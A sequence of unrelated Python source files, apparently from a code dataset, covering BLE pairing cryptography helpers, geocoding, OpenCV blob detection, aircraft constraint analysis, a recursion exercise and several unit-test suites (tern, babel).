        box[:, 2][box[:, 2]>w] = w
        box[:, 3][box[:, 3]>h] = h
        box_w = box[:, 2] - box[:, 0]
        box_h = box[:, 3] - box[:, 1]
        box = box[np.logical_and(box_w>1, box_h>1)] # discard invalid box
        if len(box)>max_boxes: box = box[:max_boxes]
        np.random.shuffle(box)
        box_data[:len(box)] = box
    return image, image_data, box_data, picname
| StarcoderdataPython |
1771294 | #!/usr/bin/env python
import h5py
import numpy as np
# Collect all eigenvalues from every symmetry sector of an ALPS
# diagonalization output file and save them as one sorted spectrum.
ltype = "chain"
L = 6
filename="alpsraw/spectra.{}.{}.task1.out.h5".format(ltype, L)
spectrum = []
with h5py.File(filename, "r") as f:
    for key in f["spectrum"]["sectors"].keys():
        sector = f["spectrum"]["sectors"][key]
        spectrum += list(sector["energies"][:])
        print(sector["energies"][:])
spectrum.sort()
np.savetxt("spectrum.{}.{}.txt".format(ltype, L), np.array(spectrum))
| StarcoderdataPython |
3209557 | <reponame>castvoid/type-safely<gh_stars>0
from google.protobuf.message import Message
from cryptography.hazmat.primitives.asymmetric import ec
import cryptography.hazmat.backends
from Crypto.Hash import CMAC
from Crypto.Cipher import AES
import os
import binascii
def wrapper_contains_type(wrapper: Message, message_type):
    """Return True if *wrapper* currently holds a message of *message_type*.

    The oneof field name is derived from the message type's full protobuf
    name with dots replaced by underscores.
    """
    if wrapper is None:
        return False
    field = "message_" + message_type.DESCRIPTOR.full_name.replace(".", "_")
    return wrapper.HasField(field)
def wrapper_get_contents(wrapper: Message, message_type=None):
    """Extract the inner message from *wrapper*.

    When *message_type* is given, read that specific oneof field; otherwise
    return whichever oneof field is currently set.
    """
    if message_type is None:
        field = wrapper.WhichOneof("message")
    else:
        field = "message_" + message_type.DESCRIPTOR.full_name.replace(".", "_")
    return getattr(wrapper, field)
def crypto_generate_keypair():
    """Generate a fresh P-256 keypair, returned as (private_bytes, public_bytes)."""
    private: ec.EllipticCurvePrivateKeyWithSerialization = ec.generate_private_key(ec.SECP256R1(), cryptography.hazmat.backends.default_backend())
    public: ec.EllipticCurvePublicKey = private.public_key()
    # Serialize to the raw byte forms used throughout this module.
    ser_private = _crypto_private_to_bytes(private)
    ser_public = _crypto_public_to_bytes(public)
    return ser_private, ser_public
def crypto_get_nonce(length=16):
    """Return *length* cryptographically secure random bytes (default 16)."""
    return os.urandom(length)
def crypto_aes_cmac(k: bytes, m: bytes):
    """Return AES-CMAC_k(m) as raw bytes."""
    mac = CMAC.new(k, ciphermod=AES)
    mac.update(m)
    return mac.digest()
def crypto_ble_f4(u, v, x, z):
    """BLE pairing confirm value: f4(U, V, X, Z) = AES-CMAC_X(U || V || Z)."""
    message = u + v + z
    return crypto_aes_cmac(x, message)
def crypto_ble_f5(w, n1, n2, a1, a2):
    """BLE key generation function f5: derive (MacKey, LTK) from DH key *w*."""
    # Fixed SALT and keyID ("btle") constants from the Bluetooth Core
    # specification's LE Secure Connections key generation function f5.
    salt = binascii.unhexlify("6C88 8391 AAF5 A538 6037 0BDB 5A60 83BE".replace(" ", ""))
    keyid = binascii.unhexlify("62 74 6c 65".replace(" ", ""))
    # Intermediate key T = AES-CMAC_SALT(W).
    t = crypto_aes_cmac(salt, w)
    def get_f5_counter(counter: int):
        # Block layout: Counter || keyID || N1 || N2 || A1 || A2 || Length.
        m = counter.to_bytes(length=1, byteorder='big') + keyid + n1 + n2 + a1 + a2
        length = 256  # output key length in bits, per the spec's f5 definition
        m = m + length.to_bytes(length=2, byteorder='big')
        return crypto_aes_cmac(t, m)
    # Counter 0 yields MacKey, counter 1 yields the LTK.
    mackey = get_f5_counter(0)
    ltk = get_f5_counter(1)
    return mackey, ltk
def crypto_ble_f6(w, *args):
    """BLE check value f6: AES-CMAC_w over the concatenation of *args*."""
    message = b''.join(args)
    return crypto_aes_cmac(w, message)
def _crypto_private_from_bytes(data: bytes) -> ec.EllipticCurvePrivateKey:
    # Interpret *data* as a big-endian P-256 private scalar.
    return ec.derive_private_key(
        private_value=int.from_bytes(bytes=data, byteorder='big'),
        curve=ec.SECP256R1(),
        backend=cryptography.hazmat.backends.default_backend()
    )
def _crypto_public_from_bytes(data: bytes) -> ec.EllipticCurvePublicKey:
    # Decode an encoded P-256 point back into a public key object.
    return ec.EllipticCurvePublicNumbers.from_encoded_point(
        curve=ec.SECP256R1(),
        data=data
    ).public_key(backend=cryptography.hazmat.backends.default_backend())
def _crypto_private_to_bytes(private: ec.EllipticCurvePrivateKeyWithSerialization) -> bytes:
    # Serialize the private scalar as 32 big-endian bytes.
    numbers: ec.EllipticCurvePrivateNumbers = private.private_numbers()
    v: int = numbers.private_value
    return v.to_bytes(length=32, byteorder='big')
def _crypto_public_to_bytes(public: ec.EllipticCurvePublicKey) -> bytes:
    # Serialize the public key as an encoded EC point.
    numbers: ec.EllipticCurvePublicNumbers = public.public_numbers()
    return numbers.encode_point()
def crypto_derive_dhkey(private_bytes: bytes, public_bytes: bytes):
    """ECDH: derive the shared secret from our private key and a peer public key."""
    our_key = _crypto_private_from_bytes(private_bytes)
    peer_key = _crypto_public_from_bytes(public_bytes)
    return our_key.exchange(ec.ECDH(), peer_key)
if __name__ == "__main__":
    # Smoke test: derive a DH key from two fixed P-256 private keys
    # (presumably the Bluetooth spec's ECDH sample vectors -- verify).
    private_a_raw = binascii.unhexlify(
        "3f49f6d4 a3c55f38 74c9b3e3 d2103f50 4aff607b eb40b799 5899b8a6 cd3c1abd".replace(" ", ""))
    private_b_raw = binascii.unhexlify(
        "55188b3d 32f6bb9a 900afcfb eed4e72a 59cb9ac2 f19d7cfb 6b4fdd49 f47fc5fd".replace(" ", ""))
    private_b = _crypto_private_from_bytes(private_b_raw)
    public_b_raw = _crypto_public_to_bytes(private_b.public_key())
    print(crypto_derive_dhkey(private_a_raw, public_b_raw))
| StarcoderdataPython |
145285 | from typing import Tuple
import googlemaps
from model.exception import UnexpectedNumberOfLocationsForAddressError
from paths import GOOGLE_CLOUD_PLATFORMS_API_KEY_FILE
class AddressLocator(object):
    """Geocode postal addresses to coordinates via the Google Maps API."""
    def __init__(self):
        # Read the API key from disk once and build a shared client.
        with open(GOOGLE_CLOUD_PLATFORMS_API_KEY_FILE, encoding='utf8', mode='r') as api_key_file:
            api_key= api_key_file.read().strip()
        self.gmaps_client: googlemaps.Client = googlemaps.Client(key=api_key)
    def get_coordinates(self, street: str, zip: str, country: str) -> Tuple[float, float]:
        ''' Returns coordinates as (latitude, longitude) '''
        address = street + ', ' + zip + ', ' + country
        api_response = self.gmaps_client.geocode(address)
        # Require exactly one candidate; anything else is ambiguous/unknown.
        if not len(api_response) == 1:
            raise UnexpectedNumberOfLocationsForAddressError(len(api_response), address)
        location = api_response[0]['geometry']['location']
        return location['lat'], location['lng']
| StarcoderdataPython |
3344397 | <reponame>asifjoardar/tern
import unittest
from tern.utils import general
class TestUtilGeneral(unittest.TestCase):
    """Unit tests for tern.utils.general image-string helpers."""
    def testImageString(self):
        # check_image_string accepts name:tag and name@digest_type:digest.
        correct_strings = [
            'image@digest_type:digest',
            'image:tag',
            'debian:buster',
            'golang:1.12-alpine',
            ('p12/test@sha256:737aaa0caf3b8f64baa41ebf78c6cd0c43f34fadccc1275'
             'a32b8ab5d5b75c344')
        ]
        incorrect_strings = [
            'debian',
            'image',
            'debian@sha',
            'test/v1.56'
        ]
        for image_str in correct_strings:
            self.assertTrue(general.check_image_string(image_str))
        for image_str in incorrect_strings:
            self.assertFalse(general.check_image_string(image_str))
    def testParseImageString(self):
        # parse_image_string splits an image reference into
        # name/tag/digest_type/digest, with empty strings for absent parts.
        hello = 'hello-world'
        debian = 'debian:9.8-slim'
        distroless = 'gcr.io/distroless/static'
        resizer = 'gcr.io/google-containers/addon-resizer:2.3'
        etcd = ('bitnami/etcd@sha256:35862e29b27efd97cdf4a1fc79abc1341feac556'
                '32e4256b02e6cfee9a4b6455')
        self.assertEqual(general.parse_image_string(hello),
                         {'name': 'hello-world',
                          'tag': '',
                          'digest_type': '',
                          'digest': ''})
        self.assertEqual(general.parse_image_string(debian),
                         {'name': 'debian',
                          'tag': '9.8-slim',
                          'digest_type': '',
                          'digest': ''})
        self.assertEqual(general.parse_image_string(distroless),
                         {'name': 'gcr.io/distroless/static',
                          'tag': '',
                          'digest_type': '',
                          'digest': ''})
        self.assertEqual(general.parse_image_string(resizer),
                         {'name': 'gcr.io/google-containers/addon-resizer',
                          'tag': '2.3',
                          'digest_type': '',
                          'digest': ''})
        self.assertEqual(general.parse_image_string(etcd),
                         {'name': 'bitnami/etcd',
                          'tag': '',
                          'digest_type': 'sha256',
                          'digest': ('35862e29b27efd97cdf4a1fc79abc1341fe'
                                     'ac55632e4256b02e6cfee9a4b6455')})
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
100740 | # lec5prob9-semordnilap.py
# edX MITx 6.00.1x
# Introduction to Computer Science and Programming Using Python
# Lecture 5, problem 9
# A semordnilap is a word or a phrase that spells a different word when backwards
# ("semordnilap" is a semordnilap of "palindromes"). Here are some examples:
#
# nametag / gateman
# dog / god
# live / evil
# desserts / stressed
#
# Write a recursive program, semordnilap, that takes in two words and says if
# they are semordnilap.
def semordnilap(str1, str2):
    '''
    str1: a string
    str2: a string
    returns: True if str1 and str2 are semordnilap;
    False otherwise.
    '''
    # Base cases: both exhausted -> match; only one exhausted -> length mismatch.
    if not str1 and not str2:
        return True
    if not str1 or not str2:
        return False
    # The first char of str1 must mirror the last char of str2.
    if str1[0] != str2[-1]:
        return False
    # Peel one character off each end and recurse.
    return semordnilap(str1[1:], str2[:-1])
# Performing a semordnilap comparison using slicing notation,
# but this is not valid for this assignment
# elif str1 == str2[::-1]:
# return True
# Example of calling semordnilap()
theResult = semordnilap('may', 'yam')
print (str(theResult))
| StarcoderdataPython |
3335437 | <reponame>cpostbitbuckets/BucketVision
import cv2
import time
# Demo: detect overlapping circular blobs ("balls") in a static image using
# an HSV colour threshold plus distance-transform template matching.
im = cv2.imread('balls.jpg')
# Scale the image down to 640 px wide, preserving aspect ratio.
w = 640.0
r = w / im.shape[1]
dim = (int(w), int(im.shape[0] * r))
im = cv2.resize(im, dim, interpolation = cv2.INTER_AREA)
start = time.time()
hsv = cv2.cvtColor(im, cv2.COLOR_BGR2HSV)
# Hand-tuned HSV range for the ball colour.
hue = [0.0, 61.74061433447099]
sat = [73.38129496402877, 255.0]
val = [215.55755395683454, 255.0]
thresh3 = cv2.inRange(hsv, (hue[0], sat[0], val[0]), (hue[1], sat[1], val[1]))
# NOTE(review): the Otsu threshold below is computed but immediately
# overwritten by the HSV mask on the next line -- dead code?
th, bw = cv2.threshold(hsv[:, :, 2], 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)
bw = thresh3
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5, 5))
morph = cv2.morphologyEx(bw, cv2.MORPH_CLOSE, kernel)
# Distance-transform peaks approximate ball centres even when balls touch.
dist = cv2.distanceTransform(morph, cv2.DIST_L2, cv2.DIST_MASK_PRECISE)
borderSize = 25 #75
distborder = cv2.copyMakeBorder(dist, borderSize, borderSize, borderSize, borderSize,
                                cv2.BORDER_CONSTANT | cv2.BORDER_ISOLATED, 0)
gap = 10
# Build a circular distance-transform template to correlate against.
kernel2 = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (2*(borderSize-gap)+1, 2*(borderSize-gap)+1))
kernel2 = cv2.copyMakeBorder(kernel2, gap, gap, gap, gap,
                             cv2.BORDER_CONSTANT | cv2.BORDER_ISOLATED, 0)
distTempl = cv2.distanceTransform(kernel2, cv2.DIST_L2, cv2.DIST_MASK_PRECISE)
nxcor = cv2.matchTemplate(distborder, distTempl, cv2.TM_CCOEFF_NORMED)
mn, mx, _, _ = cv2.minMaxLoc(nxcor)
# Keep correlation peaks above half of the best score.
th, peaks = cv2.threshold(nxcor, mx*0.5, 255, cv2.THRESH_BINARY)
peaks8u = cv2.convertScaleAbs(peaks)
_, contours, hierarchy = cv2.findContours(peaks8u, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)
peaks8u = cv2.convertScaleAbs(peaks) # to use as mask
for i in range(len(contours)):
    area = cv2.contourArea(contours[i])
    if 12 < area:
        x, y, w, h = cv2.boundingRect(contours[i])
        # Circle centred at the distance-transform maximum inside the peak
        # region; radius equals the peak distance value.
        _, mx, _, mxloc = cv2.minMaxLoc(dist[y:y+h, x:x+w], peaks8u[y:y+h, x:x+w])
        cv2.circle(im, (int(mxloc[0]+x), int(mxloc[1]+y)), int(mx), (255, 0, 0), 2)
        cv2.rectangle(im, (x, y), (x+w, y+h), (0, 255, 0), 2)
        cv2.drawContours(im, contours, i, (0, 0, 255), 2)
print("Duration = ",time.time() - start)
cv2.imshow('Balls', im)
cv2.waitKey(0)
| StarcoderdataPython |
16569 | <filename>CORE/engines/Gudmundsson_Constraint.py
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
##################################################################################
# File: c:\Projects\KENYA ONE PROJECT\CORE\engines\Gudmundsson_Constraint.py #
# Project: c:\Projects\KENYA ONE PROJECT\CORE\engines #
# Created Date: Thursday, January 9th 2020, 8:56:55 pm #
# Author: <NAME> ( <<EMAIL>> ) #
# ----- #
# Last Modified: Thursday January 9th 2020 8:56:55 pm #
# Modified By: <NAME> ( <<EMAIL>> ) #
# ----- #
# MIT License #
# #
# Copyright (c) 2020 KENYA ONE PROJECT #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy of#
# this software and associated documentation files (the "Software"), to deal in #
# the Software without restriction, including without limitation the rights to #
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies #
# of the Software, and to permit persons to whom the Software is furnished to do #
# so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
# ----- #
# Copyright (c) 2020 KENYA ONE PROJECT #
##################################################################################
import sys
sys.path.append("../")
from CORE.API.db_API import write_to_db, read_from_db # type: ignore
from math import sqrt, pi
import numpy as np # type: ignore
import matplotlib.pyplot as plt # type: ignore
grossWeight = read_from_db("finalMTOW")
cruiseSpeed = read_from_db("cruiseSpeed")
ROC = read_from_db("rateOfClimb") * 3.28 * 60
vLof = read_from_db("stallSpeed") * 1.1
AR = read_from_db("AR")
cdMin = read_from_db("cdMin")
wsfromsizing = read_from_db("WS")
rhoSL = read_from_db("rhoSL")
propEff = read_from_db("propEff")
cruiseAltitude: int = 10000 # ft
gForce: float = 2.0
V_ROC: float = 80.0
groundRun: int = 900
serviceCeiling: int = 18000
wsInitial: float = 22.6 # lb/f**2
g: float = 32.174
CDto: float = 0.04
CLto: float = 0.5
groundFriction: float = 0.04
def oswaldEff(AR: float) -> float:
    """Empirical straight-wing estimate of the Oswald span-efficiency factor e
    as a function of aspect ratio (commonly attributed to Raymer)."""
    return (1.78 * (1 - (0.045 * AR ** 0.68))) - 0.64
e = oswaldEff(AR)
k: float = 1 / (pi * AR * e)
write_to_db("k", k)
# standard-atmosphere air density as a function of altitude (ft)
def rhoAlt(cruiseAltitude: int) -> float:
    """Standard-atmosphere air density at *cruiseAltitude* feet,
    scaled from the sea-level density rhoSL."""
    density_ratio = (1 - 0.0000068756 * cruiseAltitude) ** 4.2561
    return rhoSL * density_ratio
rhoCruise = rhoAlt(cruiseAltitude)
# print ('air density at cruise altitude, rho = ' +str(rhoCruise))
qAltitude = 0.5 * rhoCruise * (1.688 * cruiseSpeed) ** 2
# print('dynamic pressure at altitude = ' +str(qAltitude))
# Gag Ferrar Model
def gagFerrar(bhp):
    """Normalise *bhp* using the Gagg-Ferrar density correction for altitude.

    Takes brake horsepower and returns the equivalent normalised bhp.
    """
    density_factor = 1.132 * (rhoCruise / rhoSL) - 0.132
    return bhp / density_factor
WS = np.arange(10, 30)
twTurn = qAltitude * ((cdMin / WS) + k * (gForce / qAltitude) ** 2 * (WS))
qROC = 0.5 * rhoSL * (V_ROC * 1.688) ** 2
Vv = ROC / 60
twROC = (Vv / (V_ROC * 1.688)) + (qROC * cdMin / WS) + (k * WS / qROC)
qVlof = 0.5 * rhoSL * (vLof * 1.688 / sqrt(2)) ** 2
twVlof = (
((vLof * 1.688) ** 2 / (2 * g * groundRun))
+ (qVlof * CDto / WS)
+ (groundFriction * (1 - (qVlof * CLto / WS)))
)
rhoCeiling = rhoAlt(serviceCeiling)
# print(rhoCeiling)
twCruise = qAltitude * cdMin * (1 / WS) + (k)
twCeiling = (1.667 / (np.sqrt((2 * WS / rhoCeiling) * sqrt(k / 3 * cdMin)))) + (
(k * cdMin / 3) * 4
)
plt.figure(1)
plt.subplot(121)
plt.plot(WS, twTurn, label="Rate of Turn")
plt.plot(WS, twROC, label="Rate of Climb")
plt.plot(WS, twVlof, label="Vlof")
plt.plot(WS, twCruise, label="Cruise")
plt.plot(WS, twCeiling, label="Ceiling")
plt.axvline(x=wsfromsizing)
plt.title(" Graph 1 \n HP/Weight ratio")
plt.legend()
# ax = plt.gca()
# ax.set_xticklabels([])
###NORMAlization
norm_twTurn = gagFerrar((grossWeight * twTurn * 1.688 * cruiseSpeed / (propEff * 550)))
test = grossWeight * twTurn * 1.688 * cruiseSpeed / (propEff * 550)
norm_twROC = gagFerrar((grossWeight * twROC * 1.688 * V_ROC / (propEff * 550)))
norm_twVlof = gagFerrar((grossWeight * twVlof * 1.688 * vLof / (propEff * 550)))
norm_twCruise = gagFerrar(
(grossWeight * twCruise * 1.688 * cruiseSpeed / (propEff * 550))
)
norm_twCeiling = gagFerrar(
(grossWeight * twCeiling * 1.688 * cruiseSpeed / (propEff * 550))
)
plt.subplot(122)
plt.plot(WS, norm_twTurn, label="Rate of Turn")
plt.plot(WS, norm_twROC, label="Rate of Climb")
plt.plot(WS, norm_twVlof, label="Vlof")
plt.plot(WS, norm_twCruise, label="Cruise")
plt.plot(WS, norm_twCeiling, label="Ceiling")
plt.title("Graph 2 \n Normalised BHP")
plt.legend()
plt.axvline(x=wsfromsizing)
plt.tight_layout()
if __name__ == "__main__":
plt.show()
def find_nearest(array, value: float) -> int:
    """Return the index of the element of *array* closest to *value*."""
    deltas = np.abs(array - value)
    return deltas.argmin()
# print(find_nearest(ws, plotWS))
plotWS = read_from_db("WS")
myidx = find_nearest(WS, plotWS)
def point() -> float:
    """Return the largest normalised-BHP requirement at the chosen wing loading.

    The governing design constraint is whichever of cruise/takeoff/climb/
    turn/ceiling demands the most power at index ``myidx``.
    """
    candidates = np.array([
        norm_twCruise[myidx],
        norm_twVlof[myidx],
        norm_twROC[myidx],
        norm_twTurn[myidx],
        norm_twCeiling[myidx],
    ])
    return candidates[np.argmax(candidates)]
finalBHP = point()
write_to_db("finalBHP", finalBHP)
print(finalBHP, "The Final normalised BHP")
# now switch back to figure 1 and make some changes
| StarcoderdataPython |
3354839 | <gh_stars>1-10
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007-2011 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://babel.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://babel.edgewall.org/log/.
import inspect
import os
import shutil
import tempfile
import unittest
import pytest
from datetime import date, datetime, timedelta
from babel import support
from babel.messages import Catalog
from babel.messages.mofile import write_mo
from babel._compat import BytesIO
@pytest.mark.usefixtures("os_environ")
class TranslationsTestCase(unittest.TestCase):
    """Exercise the context-aware (``*pgettext``) and domain-aware
    (``d*gettext``) lookup variants of :class:`support.Translations`
    against two in-memory catalogs ('messages' -> ``Voh*`` strings,
    'messages1' -> ``VohD*`` strings)."""

    def setUp(self):
        # Use a locale which won't fail to run the tests
        os.environ['LANG'] = 'en_US.UTF-8'
        # Parallel msgids in both catalogs; context-bound entries (context
        # 'foo') and plural entries let each API variant be told apart by
        # the distinct result strings.
        messages1 = [
            ('foo', {'string': 'Voh'}),
            ('foo', {'string': 'VohCTX', 'context': 'foo'}),
            (('foo1', 'foos1'), {'string': ('Voh1', 'Vohs1')}),
            (('foo1', 'foos1'), {'string': ('VohCTX1', 'VohsCTX1'), 'context': 'foo'}),
        ]
        messages2 = [
            ('foo', {'string': 'VohD'}),
            ('foo', {'string': 'VohCTXD', 'context': 'foo'}),
            (('foo1', 'foos1'), {'string': ('VohD1', 'VohsD1')}),
            (('foo1', 'foos1'), {'string': ('VohCTXD1', 'VohsCTXD1'), 'context': 'foo'}),
        ]
        catalog1 = Catalog(locale='en_GB', domain='messages')
        catalog2 = Catalog(locale='en_GB', domain='messages1')
        for ids, kwargs in messages1:
            catalog1.add(ids, **kwargs)
        for ids, kwargs in messages2:
            catalog2.add(ids, **kwargs)
        # Serialize both catalogs to in-memory .mo files and load them back.
        catalog1_fp = BytesIO()
        catalog2_fp = BytesIO()
        write_mo(catalog1_fp, catalog1)
        catalog1_fp.seek(0)
        write_mo(catalog2_fp, catalog2)
        catalog2_fp.seek(0)
        translations1 = support.Translations(catalog1_fp)
        translations2 = support.Translations(catalog2_fp, domain='messages1')
        # Merge the second catalog in under its own domain.
        self.translations = translations1.add(translations2, merge=False)

    def assertEqualTypeToo(self, expected, result):
        """Assert equality AND exact type identity (str vs unicode vs bytes)."""
        self.assertEqual(expected, result)
        assert type(expected) == type(result), "instance type's do not " + \
            "match: %r!=%r" % (type(expected), type(result))

    def test_pgettext(self):
        self.assertEqualTypeToo('Voh', self.translations.gettext('foo'))
        self.assertEqualTypeToo('VohCTX', self.translations.pgettext('foo',
                                                                     'foo'))

    def test_upgettext(self):
        self.assertEqualTypeToo(u'Voh', self.translations.ugettext('foo'))
        self.assertEqualTypeToo(u'VohCTX', self.translations.upgettext('foo',
                                                                       'foo'))

    def test_lpgettext(self):
        self.assertEqualTypeToo(b'Voh', self.translations.lgettext('foo'))
        self.assertEqualTypeToo(b'VohCTX', self.translations.lpgettext('foo',
                                                                       'foo'))

    def test_npgettext(self):
        self.assertEqualTypeToo('Voh1',
                                self.translations.ngettext('foo1', 'foos1', 1))
        self.assertEqualTypeToo('Vohs1',
                                self.translations.ngettext('foo1', 'foos1', 2))
        self.assertEqualTypeToo('VohCTX1',
                                self.translations.npgettext('foo', 'foo1',
                                                            'foos1', 1))
        self.assertEqualTypeToo('VohsCTX1',
                                self.translations.npgettext('foo', 'foo1',
                                                            'foos1', 2))

    def test_unpgettext(self):
        self.assertEqualTypeToo(u'Voh1',
                                self.translations.ungettext('foo1', 'foos1', 1))
        self.assertEqualTypeToo(u'Vohs1',
                                self.translations.ungettext('foo1', 'foos1', 2))
        self.assertEqualTypeToo(u'VohCTX1',
                                self.translations.unpgettext('foo', 'foo1',
                                                             'foos1', 1))
        self.assertEqualTypeToo(u'VohsCTX1',
                                self.translations.unpgettext('foo', 'foo1',
                                                             'foos1', 2))

    def test_lnpgettext(self):
        self.assertEqualTypeToo(b'Voh1',
                                self.translations.lngettext('foo1', 'foos1', 1))
        self.assertEqualTypeToo(b'Vohs1',
                                self.translations.lngettext('foo1', 'foos1', 2))
        self.assertEqualTypeToo(b'VohCTX1',
                                self.translations.lnpgettext('foo', 'foo1',
                                                             'foos1', 1))
        self.assertEqualTypeToo(b'VohsCTX1',
                                self.translations.lnpgettext('foo', 'foo1',
                                                             'foos1', 2))

    def test_dpgettext(self):
        self.assertEqualTypeToo(
            'VohD', self.translations.dgettext('messages1', 'foo'))
        self.assertEqualTypeToo(
            'VohCTXD', self.translations.dpgettext('messages1', 'foo', 'foo'))

    def test_dupgettext(self):
        self.assertEqualTypeToo(
            u'VohD', self.translations.dugettext('messages1', 'foo'))
        self.assertEqualTypeToo(
            u'VohCTXD', self.translations.dupgettext('messages1', 'foo', 'foo'))

    def test_ldpgettext(self):
        self.assertEqualTypeToo(
            b'VohD', self.translations.ldgettext('messages1', 'foo'))
        self.assertEqualTypeToo(
            b'VohCTXD', self.translations.ldpgettext('messages1', 'foo', 'foo'))

    def test_dnpgettext(self):
        self.assertEqualTypeToo(
            'VohD1', self.translations.dngettext('messages1', 'foo1', 'foos1', 1))
        self.assertEqualTypeToo(
            'VohsD1', self.translations.dngettext('messages1', 'foo1', 'foos1', 2))
        self.assertEqualTypeToo(
            'VohCTXD1', self.translations.dnpgettext('messages1', 'foo', 'foo1',
                                                     'foos1', 1))
        self.assertEqualTypeToo(
            'VohsCTXD1', self.translations.dnpgettext('messages1', 'foo', 'foo1',
                                                      'foos1', 2))

    def test_dunpgettext(self):
        self.assertEqualTypeToo(
            u'VohD1', self.translations.dungettext('messages1', 'foo1', 'foos1', 1))
        self.assertEqualTypeToo(
            u'VohsD1', self.translations.dungettext('messages1', 'foo1', 'foos1', 2))
        self.assertEqualTypeToo(
            u'VohCTXD1', self.translations.dunpgettext('messages1', 'foo', 'foo1',
                                                       'foos1', 1))
        self.assertEqualTypeToo(
            u'VohsCTXD1', self.translations.dunpgettext('messages1', 'foo', 'foo1',
                                                        'foos1', 2))

    def test_ldnpgettext(self):
        self.assertEqualTypeToo(
            b'VohD1', self.translations.ldngettext('messages1', 'foo1', 'foos1', 1))
        self.assertEqualTypeToo(
            b'VohsD1', self.translations.ldngettext('messages1', 'foo1', 'foos1', 2))
        self.assertEqualTypeToo(
            b'VohCTXD1', self.translations.ldnpgettext('messages1', 'foo', 'foo1',
                                                       'foos1', 1))
        self.assertEqualTypeToo(
            b'VohsCTXD1', self.translations.ldnpgettext('messages1', 'foo', 'foo1',
                                                        'foos1', 2))

    def test_load(self):
        # Round-trip through an on-disk locale tree:
        # <tempdir>/fr/LC_MESSAGES/messages.mo
        tempdir = tempfile.mkdtemp()
        try:
            messages_dir = os.path.join(tempdir, 'fr', 'LC_MESSAGES')
            os.makedirs(messages_dir)
            catalog = Catalog(locale='fr', domain='messages')
            catalog.add('foo', 'bar')
            with open(os.path.join(messages_dir, 'messages.mo'), 'wb') as f:
                write_mo(f, catalog)
            translations = support.Translations.load(tempdir, locales=('fr',), domain='messages')
            self.assertEqual('bar', translations.gettext('foo'))
        finally:
            shutil.rmtree(tempdir)
class NullTranslationsTestCase(unittest.TestCase):
    """Check that NullTranslations mirrors Translations' API: same
    method names, same signatures, same return values on an empty
    catalog."""

    def setUp(self):
        # Both objects load the same empty 'de' catalog, so any return-value
        # difference comes from the class, not the data.
        fp = BytesIO()
        write_mo(fp, Catalog(locale='de'))
        fp.seek(0)
        self.translations = support.Translations(fp=fp)
        self.null_translations = support.NullTranslations(fp=fp)

    def method_names(self):
        # Every *gettext* variant exposed by Translations.
        return [name for name in dir(self.translations) if 'gettext' in name]

    def test_same_methods(self):
        for name in self.method_names():
            if not hasattr(self.null_translations, name):
                self.fail('NullTranslations does not provide method %r' % name)

    def test_method_signature_compatibility(self):
        for name in self.method_names():
            translations_method = getattr(self.translations, name)
            null_method = getattr(self.null_translations, name)
            # NOTE(review): inspect.getargspec was removed in Python 3.11;
            # this needs inspect.getfullargspec / inspect.signature there.
            signature = inspect.getargspec
            self.assertEqual(signature(translations_method),
                             signature(null_method))

    def test_same_return_values(self):
        # One representative value per parameter name used by any variant.
        data = {
            'message': u'foo', 'domain': u'domain', 'context': 'tests',
            'singular': u'bar', 'plural': u'baz', 'num': 1,
            'msgid1': u'bar', 'msgid2': u'baz', 'n': 1,
        }
        for name in self.method_names():
            method = getattr(self.translations, name)
            null_method = getattr(self.null_translations, name)
            signature = inspect.getargspec(method)
            parameter_names = [name for name in signature[0] if name != 'self']
            values = [data[name] for name in parameter_names]
            self.assertEqual(method(*values), null_method(*values))
class LazyProxyTestCase(unittest.TestCase):
    """Behavioral tests for LazyProxy: result caching, cache opt-out,
    and shallow-copy vs deep-copy semantics."""

    def test_proxy_caches_result_of_function_call(self):
        self.counter = 0

        def add_one():
            self.counter += 1
            return self.counter
        proxy = support.LazyProxy(add_one)
        self.assertEqual(1, proxy.value)
        # Second access must reuse the cached result, not call add_one again.
        self.assertEqual(1, proxy.value)

    def test_can_disable_proxy_cache(self):
        self.counter = 0

        def add_one():
            self.counter += 1
            return self.counter
        proxy = support.LazyProxy(add_one, enable_cache=False)
        # Without the cache every access re-invokes the callable.
        self.assertEqual(1, proxy.value)
        self.assertEqual(2, proxy.value)

    def test_can_copy_proxy(self):
        from copy import copy

        numbers = [1, 2]

        def first(xs):
            return xs[0]
        proxy = support.LazyProxy(first, numbers)
        proxy_copy = copy(proxy)
        numbers.pop(0)
        # A shallow copy shares the argument list, so both see the mutation.
        self.assertEqual(2, proxy.value)
        self.assertEqual(2, proxy_copy.value)

    def test_can_deepcopy_proxy(self):
        from copy import deepcopy

        numbers = [1, 2]

        def first(xs):
            return xs[0]
        proxy = support.LazyProxy(first, numbers)
        proxy_deepcopy = deepcopy(proxy)
        numbers.pop(0)
        # A deep copy snapshots the argument list before the mutation.
        self.assertEqual(2, proxy.value)
        self.assertEqual(1, proxy_deepcopy.value)
def test_format_date():
    """US-English date formatting via the Format helper."""
    assert support.Format('en_US').date(date(2007, 4, 1)) == 'Apr 1, 2007'
def test_format_datetime():
    """Datetime formatting converts the naive stamp into US/Eastern."""
    from pytz import timezone
    eastern = timezone('US/Eastern')
    fmt = support.Format('en_US', tzinfo=eastern)
